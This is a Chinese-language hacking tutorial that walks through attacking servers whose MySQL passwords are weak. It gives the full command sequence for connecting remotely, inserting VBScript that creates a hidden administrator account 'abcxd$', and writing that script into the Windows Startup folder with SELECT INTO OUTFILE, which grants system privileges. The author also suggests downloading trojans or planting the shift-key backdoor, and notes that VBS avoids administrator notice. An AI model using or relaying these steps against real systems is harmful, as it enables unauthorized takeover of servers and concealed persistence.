|
作者:心动吧明生KISS
网址:http://www.abcxd.com/
好久没见教程了。今天写的这一个并没有什么特色类型的。最大的利用之处是存在于结合服务器或在webshell里面得到mysql时如何处理,并如何利用使我们得到系统权限...好了不多说了。现在我们来看看.找寻"mysql"密码所在的位置 phpMyAdmin\libraries\config.default.php
连接到对方mysql 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了mysql的的bin目录中 但这个并不是本文所在的重点.因为网络上已经出现过很多从webshell中得到密码的教程了.这一次所做的是由服务器扫描出来的mysql帐号和密码.然后从远程连接进入mysql并开始对其入侵的手法.
首先我们先连接他们的sql..如果你本机没有装mysql的话。可以用“菜牛MYSQL连接”
简介完成.现在我们进入正题吧.
第一:进入服务器开扫描器,扫出服务器中存在的mysql弱口令的机子
这时你会说.哪有这么容易被你扫到呀..但是弱口令的mysql还是很多的..慢慢你就会发现了.而且在很多提权的时候没办法了.就可以采用这种方式来找到密码后进行入侵.多一种方法多一种思路嘛..
图1
第二:接下来我们连接服务器试试,你可以用mysql命令下执行也可以.但我更喜欢是图型
连接成功后。但是别得意太早哦.毕竟还有很长路要走..呵呵吓唬你的..看下面吧
图2
第三:按照以下步骤慢慢的输入.
<2>、让我们来看看服务器中有些什么数据库
mysql > show databases;
mysql默认安装时会有mysql、test这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
图3
<3>、让我们进入数据库
mysql> use test;
我们将会进入test数据库中
<4>、查看我们进入数据库中有些什么数据表
mysql> show tables;
默认的情况下,test中没有任何表的存在。如果有其他的可能是被人拿过了.也可能是用户自己建的
以下为关键的部分
图4
<5>、在test数据库下创建一个新的表;
mysql> create table abcxd (cmd text);
好了,我们创建了一个新的表,表名为abcxd,表中只存放一个字段,字段名为cmd,为text文本。
心动吧提醒你,当你建表的时候如果出现失败.证明有表存在,还有权限问题(可能性很低)因为一般的用户都很少管理mysql.如果换成是mssql那就难说罗.毕竟国内还是很少人会用mysql提权的
<6>、在表中插入内容-注意一点哦。别打错啦
mysql > insert into abcxd values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql > insert into abcxd values ("a=wshshell.run (""cmd.exe /c net user abcxd$ abcxd /add"",0) " );
mysql > insert into abcxd values ("b=wshshell.run (""cmd.exe /c net localgroup administrators abcxd$ /add"",0) " );
注意双引号和括号以及后面的 "0"一定要输入!我们将用这三条命令来建立一个vbs的脚本程序!
心动吧小思路 "或者你可以在这里面写入一些其他的东西呀,比如一些shift5次键命令,又或者直接下载木马,随你只要你喜欢就可以,但注意格式正格"
<7>、好了,现在我们来看看表abcxd中有些什么
mysql> select * from abcxd;
我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
图5:
<8>、输出表为一个vbs的脚本文件,现在到了最重要的一步了,是不是心跳加速呀...输出到启动项.
mysql> select * from abcxd into outfile "C:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\abcxd.vbs";
我们把我们表中的内容输入到启动组中,是一个vbs的脚本文件!注意"\"符号。
图6:
最主要也是利用shell写入启动项,在未知网站目录时所采用的方法..而VBS一般比bat好,好在哪里好在他不显示窗口.管理员难发现.
好了本教程到此结束,不完全属于原创思路,毕竟语句是人家写出来的....咱们只是把人家的东西组合一起利用了一下,发掘了自己的新思路,并发布与大家分享..
by 心动吧明生KISS |
